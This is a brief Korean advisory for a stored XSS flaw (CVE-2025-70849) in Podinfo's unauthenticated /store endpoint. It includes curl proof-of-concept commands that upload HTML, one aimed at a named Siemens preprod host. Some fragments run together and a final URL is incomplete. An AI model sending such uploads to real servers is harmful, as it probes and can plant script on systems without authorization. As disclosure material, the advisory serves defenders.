
CVE-2025-70849: Podinfo의 저장형 XSS
Kubernetes 마이크로서비스 데모용 웹 애플리케이션인 Podinfo에서 보안 취약점(CWE-79)이 발견되었습니다. /store 기능은 인증되지 않은 사용자가 임의의 HTML/JS 콘텐츠를 업로드할 수 있게 하여 저장형 XSS(Stored XSS)를 유발합니다.
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'

반환된 해시에 접근합니다: https:///store/